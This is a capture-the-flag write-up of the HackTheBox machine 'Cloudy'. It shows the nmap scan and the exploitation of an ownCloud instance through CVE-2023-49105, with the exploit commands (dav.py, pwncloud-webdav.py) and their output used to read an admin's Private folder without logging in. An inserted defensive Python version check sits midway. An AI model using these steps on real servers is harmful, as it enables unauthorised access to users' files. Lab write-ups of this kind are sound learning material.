Cloudy — HackTheBox Machine
Cloudy is a very easy HackTheBox Enterprise machine that I pwned while playing CTFs to prepare for the Wicked6 2024 Cyber Game. Interestingly, I haven't found this machine on the main HackTheBox platform. I decided to document my experience because it was unique. This machine had just one flag, and the objective was to find the flag hidden in a folder named 'Private'.
I started by performing an Nmap scan: nmap -sV -sC -oA nmap 10.129.230.169
# Nmap 7.94SVN scan initiated Sat Feb 3 10:10:46 2024 as: nmap -sV -sC -oA nmap 10.129.230.169
Nmap scan report for 10.129.230.169
Host is up (0.37s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_ 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
8080/tcp open http Apache httpd
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache
|_http-title: Did not follow redirect to http://cloudy.htb:8080/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Feb 3 10:11:56 2024 -- 1 IP address (1 host up) scanned in 70.02 seconds
Upon completion of the scan, I found two open TCP ports: on port 22 an SSH server is running, and on port 8080 an Apache web server.
Under port 8080, it stated a redirection to http://cloudy.htb:8080/. With that, I added '10.129.230.169 cloudy.htb' to my /etc/hosts file.
I navigated to the site and it led me to an ownCloud login page. Since I was just discovering ownCloud, I did some research and found it's software for sharing and syncing files. I tried a few default logins, but this wasn't successful, so I decided to check whether there were any other directories or pages that would be useful.
After performing the directory brute-force, the only thing that stood out was /status.php. I navigated to it and found info about the product, including the version.
With this, I searched for a vulnerability affecting this version. Interestingly, I found one: CVE-2023-49105.
An attacker can access, modify, or delete any file without authentication if the username of a victim is known, and the victim has no signing-key configured.
More information about the vulnerability can be found here.
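As an added example (not part of the original write-up), here is a small Python triage that a defender can run against the JSON that ownCloud's /status.php exposes, the same endpoint that leaked the version above, to decide whether an instance still predates the CVE-2023-49105 fix (ownCloud core 10.13.1, per the NVD entry). The sample responses are constructed, and the key names (productname, version, versionstring) follow the status.php format as I know it; the version strings are placeholders.

```python
import json

# CVE-2023-49105 is fixed in ownCloud core 10.13.1 (NVD description: "before 10.13.1").
FIXED_VERSION = (10, 13, 1)

# Constructed sample status.php bodies; the version values are placeholders, not real findings.
SAMPLE_STATUS = [
    '{"installed":true,"maintenance":false,"needsDbUpgrade":false,'
    '"version":"10.13.0.5","versionstring":"10.13.0","edition":"Community","productname":"ownCloud"}',
    '{"installed":true,"maintenance":false,"needsDbUpgrade":false,'
    '"version":"10.13.1.0","versionstring":"10.13.1","edition":"Community","productname":"ownCloud"}',
]


def parse_version(text):
    """Turn '10.13.0.5' into (10, 13, 0, 5); a non-numeric part ends the tuple."""
    parts = []
    for piece in text.split("."):
        if not piece.isdigit():
            break
        parts.append(int(piece))
    return tuple(parts)


def is_vulnerable_version(text):
    """True when major.minor.patch is below the fixed release.

    Only three components are compared, and missing ones are padded with 0,
    so '10.13.1.0' (four-part build string) is not ranked below '10.13.1'.
    """
    parsed = parse_version(text)
    if not parsed:
        raise ValueError("unparseable version string: %r" % text)
    padded = (parsed + (0, 0, 0))[:3]
    return padded < FIXED_VERSION


def triage_status(body):
    """Parse one status.php body; returns (product, version, vulnerable-or-None)."""
    data = json.loads(body)
    product = data.get("productname", "unknown")
    version = data.get("version") or data.get("versionstring")
    if product != "ownCloud" or not version:
        return product, version, None  # not ownCloud, or no version to judge
    return product, version, is_vulnerable_version(version)


if __name__ == "__main__":
    for body in SAMPLE_STATUS:
        print(triage_status(body))
```

The `None` result is deliberate: a response that is not ownCloud or carries no version is reported as undecided rather than silently marked safe.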
To exploit this vulnerability, I had to combine two exploits: ownedcloud and ownedcloud-exploits.
After cloning them both to my local machine and installing the requirements, I ran the first exploit.
python3 ownedcloud/dav.py -u admin -t http://cloudy.htb:8080
└─$ python3 /home/vxxmass/Downloads/ownedcloud/dav.py -u admin -t http://cloudy.htb:8080
INFO:root:Pwning admin!
INFO:root:admin's root folder content
INFO:root:File(name='/remote.php/webdav/', size=0, mtime='Thu, 14 Dec 2023 07:29:31 GMT', ctime='', contenttype='')
INFO:root:File(name='/remote.php/webdav/Documents/', size=0, mtime='Thu, 14 Dec 2023 07:29:02 GMT', ctime='', contenttype='')
INFO:root:File(name='/remote.php/webdav/Learn%20more%20about%20ownCloud/', size=0, mtime='Thu, 14 Dec 2023 07:29:02 GMT', ctime='', contenttype='')
INFO:root:File(name='/remote.php/webdav/Photos/', size=0, mtime='Thu, 14 Dec 2023 07:29:02 GMT', ctime='', contenttype='')
INFO:root:File(name='/remote.php/webdav/Private/', size=0, mtime='Thu, 14 Dec 2023 07:29:31 GMT', ctime='', contenttype='')
The first script connected to the WebDAV server and listed the contents of the admin user's root directory. From this, I could see the Private folder.
I ran the next exploit to get access to the Private folder of the admin user.
└─$ ./pwncloud-webdav.py http://cloudy.htb:8080/login admin
[+] Proxy server running on localhost:8800
[*] Browse user files: dav://anonymous@localhost:8800/remote.php/dav/files/admin
[*] Browse everything: dav://anonymous@localhost:8800/remote.php/dav
127.0.0.1 - - [21/Feb/2024 05:03:05] "OPTIONS /remote.php/dav/files/admin HTTP/1.1" 302 -
127.0.0.1 - - [21/Feb/2024 05:03:37] "OPTIONS /remote.php/webdav/Private HTTP/1.1" 302 -
When this ran, it started a proxy on localhost:8800 and directed me to browse the admin user's files through it at:
dav://anonymous@localhost:8800/remote.php/dav/files/admin
After doing so, I could see the folders.
Since the goal was to access the Private folder and get the flag, I navigated to it and got the flag.
Quite easy right?
Yeah, it was, but not as easy as it's written here. I encountered errors when running the exploits and also when trying to reach the local proxy. Even with all that, it was fun and interesting because I learned new things.
Thank you for reading to this point.
Happy Hacking!